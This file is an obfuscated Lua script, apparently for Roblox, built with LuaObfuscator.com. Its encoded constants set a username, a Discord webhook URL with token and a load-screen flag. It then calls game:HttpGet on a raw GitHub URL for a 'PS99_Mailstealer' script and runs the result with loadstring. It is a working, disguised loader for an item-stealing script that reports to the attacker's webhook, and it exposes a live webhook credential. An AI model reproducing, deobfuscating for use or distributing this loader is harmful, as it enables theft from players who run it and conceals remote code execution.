--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.5) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==7) then function v30(v31,v32,v33) local v34=0;local v35;local v36;local v37;while true do if (v34==0) then v35=v31[1];v36=v31[2];v34=1;end if (v34==1) then v37=v31[3];return function(...) local v78=v35;local v79=v36;local v80=v37;local v81=v28;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v94=0,v86 do if (v94>=v80) then v84[v94-v80 ]=v85[v94 + 1 ];else v88[v94]=v85[v94 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do v90=v78[v82];v91=v90[1];if (v91<=4) then if (v91<=1) then if (v91==0) then local v110=0;local v111;while true do if (v110==0) then v111=v90[2];v88[v111]=v88[v111](v13(v88,v111 + 1 ,v83));break;end end else v88[v90[2]]=v33[v90[3]];end elseif (v91<=2) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>3) then v88[v90[2]]();else local v121=v90[2];local v122,v123=v81(v88[v121](v13(v88,v121 + 1 ,v90[3])));v83=(v123 + v121) -1 ;local v124=0;for v141=v121,v83 do local v142=0;while true do if (v142==0) then v124=v124 + 1 ;v88[v141]=v122[v124];break;end end end end elseif (v91<=6) then if (v91>5) then local v115=0;local v116;local v117;while true do if (v115==1) then v88[v116 + 1 ]=v117;v88[v116]=v117[v90[4]];break;end if (v115==0) then v116=v90[2];v117=v88[v90[3]];v115=1;end end else v88[v90[2]]=v90[3];end elseif (v91<=7) then do return;end elseif (v91>8) then local v125;local v126;v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v33[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v33[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v33[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v33[v90[3]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v33[v90[3]];v82=v82 + 1 ;v90=v78[v82];v126=v90[2];v125=v88[v90[3]];v88[v126 + 1 ]=v125;v88[v126]=v125[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];else v33[v90[3]]=v88[v90[2]];end v82=v82 + 1 ;end end;end end end return v30(v29(),{},v17)(...);end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v38) if (v1(v38,2)==79) then local v69=0;while true do if (v69==0) then v20=v0(v3(v38,1,1));return "";end end else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v38,16));if v20 then local v105=0;local v106;while true do if (v105==1) then return v106;end if (v105==0) then v106=v5(v71,v20);v20=nil;v105=1;end end else return v71;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v39,v40,v41,v42=v1(v16,v19,v19 + 3 );v19=v19 + (12 -8) ;return (v42 * 16777216) + (v41 * (187552 -122016)) + (v40 * (493 -237)) + v39 ;end v25=nil;v18=4;end if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v43,v44,v45) if v45 then local v72=(v43/((4 -2)^(v44-(620 -(555 + (91 -27))))))%(2^(((v45-((1997 -(68 + 997)) -(857 + 74))) -(v44-(569 -(367 + 201)))) + (928 -((1484 -(226 + 1044)) + 713)))) ;return v72-(v72%(1 + (0 -0))) ;else local v73=(117 -(32 + 85)) + 0 ;local v74;while true do if (v73==0) then v74=(879 -(282 + 595))^(v44-(1638 -(1523 + 114))) ;return (((v43%(v74 + v74))>=v74) and 1) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==2) then function v22() local v46=v1(v16,v19,v19);v19=v19 + 1 ;return v46;end v23=nil;function v23() local v47,v48=v1(v16,v19,v19 + 2 + 0 );v19=v19 + 2 ;return (v48 * (57 + 199)) + v47 ;end v18=3;end if (v18==4) then function v25() local v49=957 -(892 + 65) ;local v50;local v51;local v52;local v53;local v54;local v55;while true do if (v49==(2 -1)) then v52=(3 -2) -0 ;v53=(v21(v51,1 -(0 + 0) ,370 -(87 + 263) ) * ((182 -(67 + 113))^(24 + 8))) + v50 ;v49=4 -2 ;end if (v49==(3 + 0)) then if (v54==(0 -0)) then if (v53==(952 -(802 + 150))) then return v55 * (0 -0) ;else local v107=0;while true do if (v107==0) then v54=1 -0 ;v52=(0 -0) + 0 ;break;end end end elseif (v54==(3044 -(915 + 82))) then return ((v53==(0 -(0 -0))) and (v55 * ((1 + (438 -(145 + 293)))/0))) or (v55 * NaN) ;end return v8(v55,v54-(1344 -(751 -(44 + 386))) ) * (v52 + (v53/(((2675 -(998 + 488)) -(1069 + 118))^52))) ;end if (v49==0) then v50=v24();v51=v24();v49=1;end if (v49==(4 -2)) then v54=v21(v51,45 -(42 -(10 + 8)) ,(22 -16) + 25 );v55=((v21(v51,(18 + 38) -24 )==(1 + 0 + 0)) and  -(443 -(416 + 26))) or (792 -(368 + 423)) ;v49=3;end end end v26=nil;function v26(v56) local v57=772 -(201 + 571) ;local v58;local v59;while true do if (((2023 -884) -((1539 -(630 + 793)) + 1022))==v57) then v58=v3(v16,v19,(v19 + v56) -(4 -3) );v19=v19 + v56 ;v57=2 + (0 -0) ;end if (v57==(10 -7)) then return v6(v59);end if (v57==0) then v58=nil;if  not v56 then local v97=0 -0 ;while true do if (v97==(859 -(814 + (213 -168)))) then v56=v24();if (v56==(0 -0)) then return "";end break;end end end v57=1 + 0 ;end if (v57==(1 + (1081 -(1020 + 60)))) then v59={};for v92=1, #v58 do v59[v92]=v2(v1(v3(v58,v92,v92)));end v57=888 -(261 + 246 + 378) ;end end end v18=5;end if (v18==6) then v29=nil;function v29() local v60=603 -(268 + 335) ;local v61;local v62;local v63;local v64;local v65;local v66;local v67;local v68;while true do if (v60~=(291 -(60 + 230))) then else v63=nil;v64=nil;v60=2 + 0 ;end if (v60~=2) then else v65=nil;v66=nil;v60=575 -(426 + 146) ;end if (v60==3) then v67=nil;v68=nil;v60=3 + 1 ;end if (v60~=4) then else while true do if ((1 + 0)~=v61) then else local v98=0;while true do if (v98~=(0 -0)) then else v64=nil;v65=nil;v98=1457 -(282 + 1174) ;end if ((812 -(569 + 242))==v98) then v61=1935 -(565 + 1368) ;break;end end end if (v61~=(5 -3)) then else local v99=0 + 0 ;local v100;while true do if (v99~=(1024 -(706 + 318))) then else v100=1251 -(721 + 530) ;while true do if (v100==(0 + 0)) then local v120=0;while true do if (1~=v120) then else v100=1;break;end if (0==v120) then v66=nil;v67=nil;v120=1;end end end if (v100==1) then v61=1274 -(945 + 326) ;break;end end break;end end end if (v61~=(0 -0)) then else v62=0;v63=nil;v61=1;end if (v61~=3) then else v68=nil;while true do local v108=0;local v109;while true do if (v108~=(0 + 0)) then else v109=856 -(564 + 292) ;while true do if (v109~=1) then else if ((0 -0)==v62) then local v148=700 -(271 + 429) ;local v149;while true do if ((0 + 0)==v148) then v149=1500 -(1408 + 92) ;while true do if ((1086 -(461 + 625))==v149) then local v157=1288 -(993 + 295) ;while true do if (v157==(477 -(41 + 435))) then v149=1 + 0 ;break;end if (v157~=(0 + 0)) then else v63={};v64={};v157=1172 -(418 + 753) ;end end end if (v149==(1 + 0)) then v65={};v62=1;break;end end break;end end end if (v62~=2) then else local v150=0 + 0 ;local v151;local v152;while true do if ((0 + 0)==v150) then v151=0 + 0 ;v152=nil;v150=1;end if (v150~=1) then else while true do if (v151~=(529 -(406 + 123))) then else v152=1769 -(1749 + 20) ;while true do if (v152==(0 + 0)) then for v161=1323 -(1249 + 73) ,v67 do local v162=0 -0 ;local v163;local v164;local v165;while true do if (v162~=1) then else v165=nil;while true do if (v163==(0 + 0)) then local v174=1145 -(466 + 679) ;local v175;while true do if ((0 -0)~=v174) then else v175=0 + 0 ;while true do if (v175~=0) then else local v185=0 -0 ;while true do if (v185~=(1901 -(106 + 1794))) then else v175=1 + 0 ;break;end if (v185==0) then v164=v22();v165=nil;v185=1 + 0 ;end end end if (v175~=(2 -1)) then else v163=2 -1 ;break;end end break;end end end if (v163~=(115 -(4 + 110))) then else if (v164==(585 -(57 + 527))) then v165=v22()~=(1427 -(41 + 1386)) ;elseif (v164==(4 -2)) then v165=v25();elseif (v164==(106 -(17 + 86))) then v165=v26();end v68[v161]=v165;break;end end break;end if ((0 + 0)~=v162) then else local v173=0;while true do if (v173~=1) then else v162=1;break;end if (v173==(0 -0)) then v163=0;v164=nil;v173=1 -0 ;end end end end end v66[8 -5 ]=v22();v152=167 -(122 + 44) ;end if (v152==(1 -0)) then for v166=3 -2 ,v24() do local v167=0 + 0 ;local v168;local v169;local v170;while true do if ((612 -(602 + 9))~=v167) then else v170=nil;while true do if ((1189 -(449 + 740))==v168) then local v177=0 + 0 ;while true do if (v177~=(1 -0)) then else v168=3 -2 ;break;end if (v177~=(0 + 0)) then else local v178=0;while true do if (v178==(65 -(30 + 35))) then v169=0 + 0 ;v170=nil;v178=1899 -(260 + 1638) ;end if (1==v178) then v177=1258 -(1043 + 214) ;break;end end end end end if (v168==(3 -2)) then while true do if (v169==(0 + 0)) then v170=v22();if (v21(v170,3 -2 ,1 -0 )==(0 -0)) then local v179=1212 -(323 + 889) ;local v180;local v181;local v182;local v183;local v184;while true do if (v179~=(1 -0)) then else v182=nil;v183=nil;v179=5 -3 ;end if (v179~=(582 -(361 + 219))) then else v184=nil;while true do if (v180==(1690 -(1121 + 569))) then local v186=214 -(22 + 192) ;while true do if (v186~=(320 -(53 + 267))) then else v181=0 + 0 ;v182=nil;v186=684 -(483 + 200) ;end if (v186~=(414 -(15 + 398))) then else v180=983 -(18 + 964) ;break;end end end if ((3 -2)==v180) then v183=nil;v184=nil;v180=2;end if (v180~=(767 -(468 + 297))) then else while true do if ((1 + 0)~=v181) then else local v187=0;local v188;local v189;while true do if (v187~=(0 + 0)) then else v188=850 -(20 + 830) ;v189=nil;v187=3 -2 ;end if (v187==(1 + 0)) then while true do if (0~=v188) then else v189=0 -0 ;while true do if (v189~=(1 + 0)) then else v181=238 -(141 + 95) ;break;end if (v189~=0) then else local v202=0 + 0 ;while true do if (1==v202) then v189=2 -1 ;break;end if (0==v202) then local v203=0;while true do if (v203~=1) then else v202=1;break;end if (v203~=0) then else v184={v23(),v23(),nil,nil};if (v182==(738 -(542 + 196))) then local v204=0 -0 ;local v205;local v206;while true do if (v204~=1) then else while true do if (v205~=(0 + 0)) then else v206=0;while true do if (v206==0) then v184[3]=v23();v184[3 + 1 ]=v23();break;end end break;end end break;end if (v204~=0) then else v205=0 + 0 ;v206=nil;v204=1 -0 ;end end elseif (v182==1) then v184[3]=v24();elseif (v182==(1 + 1)) then v184[2 + 1 ]=v24() -((165 -(92 + 71))^(8 + 8)) ;elseif (v182==(7 -4)) then local v209=0 -0 ;local v210;local v211;while true do if (v209==1) then while true do if (v210==(1551 -(1126 + 425))) then v211=0 + 0 ;while true do if (v211==(405 -(118 + 287))) then v184[11 -8 ]=v24() -((2 + 0)^16) ;v184[853 -(254 + 595) ]=v23();break;end end break;end end break;end if ((126 -(55 + 71))==v209) then v210=1121 -(118 + 1003) ;v211=nil;v209=1;end end end v203=2 -1 ;end end end end end end break;end end break;end end end if (v181~=(0 -0)) then else local v190=377 -(142 + 235) ;local v191;while true do if (v190~=(0 -0)) then else v191=0;while true do if (v191~=(1 + 0)) then else v181=978 -(553 + 424) ;break;end if ((0 -0)==v191) then local v197=0 + 0 ;while true do if ((939 -(714 + 225))~=v197) then else v182=v21(v170,5 -3 ,3 + 0 );v183=v21(v170,3 + 1 ,1 + 5 );v197=1 + 0 ;end if (v197==(1 + 0)) then v191=1;break;end end end end break;end end end if ((6 -3)~=v181) then else if (v21(v183,3,51 -(25 + 23) )==(2 -1)) then v184[8 -4 ]=v68[v184[4]];end v63[v166]=v184;break;end if (v181~=2) then else local v193=0 + 0 ;while true do if (v193==(4 -3)) then v181=3;break;end if (v193~=(753 -(239 + 514))) then else local v196=0;while true do if ((1 + 0)==v196) then v193=1;break;end if ((732 -(16 + 716))~=v196) then else if (v21(v183,1,1)~=1) then else v184[1331 -(797 + 532) ]=v68[v184[99 -(11 + 86) ]];end if (v21(v183,4 -2 ,2)==1) then v184[3]=v68[v184[3 + 0 ]];end v196=2 -1 ;end end end end end end break;end end break;end if ((0 + 0)==v179) then v180=0 -0 ;v181=nil;v179=1203 -(373 + 829) ;end end end break;end end break;end end break;end if (v167==(0 -0)) then v168=731 -(476 + 255) ;v169=nil;v167=1;end end end v62=1133 -(369 + 761) ;break;end end break;end end break;end end end break;end if (v109~=(0 + 0)) then else local v138=0 -0 ;while true do if (v138==(0 + 0)) then if (v62~=(1 -0)) then else local v155=238 -(64 + 174) ;while true do if (v155~=1) then else v68={};v62=2;break;end if (v155~=0) then else local v158=0 + 0 ;while true do if (v158==(0 -0)) then v66={v63,v64,nil,v65};v67=v24();v158=217 -(42 + 174) ;end if ((1 + 0)==v158) then v155=1;break;end end end end end if (v62~=(862 -(240 + 619))) then else local v156=0 + 0 ;while true do if ((0 -0)==v156) then local v159=0 + 0 ;while true do if (v159==(0 + 0)) then for v171=1745 -(1344 + 400) ,v24() do v64[v171-(406 -(255 + 150)) ]=v29();end return v66;end end end end end v138=1505 -(363 + 1141) ;end if (v138==(1 + 0)) then v109=1581 -(1183 + 397) ;break;end end end end break;end end end break;end end break;end if ((0 -0)==v60) then v61=0;v62=nil;v60=1740 -(404 + 1335) ;end end end v30=nil;v18=7;end end end return v15("LOL!093O0003083O00557365726E616D6503093O0032346B6368696B6930030A3O004C6F61645363722O656E03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F31323338373133363139302O35393036382O302F476B2O416F4D79596E6453424A5739764E2D6C7A374E773853335361656E78713231643941344A666D3272654634745666454E304564653339464466382O4B6C566A4143030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574034D3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4B692O75502F50532O395F4D61696C737465616C65722F6D61696E2F4D61696C537465616C65722E6C7561000E3O0012093O00023O00124O00018O00013O00124O00033O00124O00053O00124O00043O00124O00063O00122O000100073O00202O00010001000800122O000300094O0003000100039O0000022O00043O000100012O00073O00017O00",v9(),...);
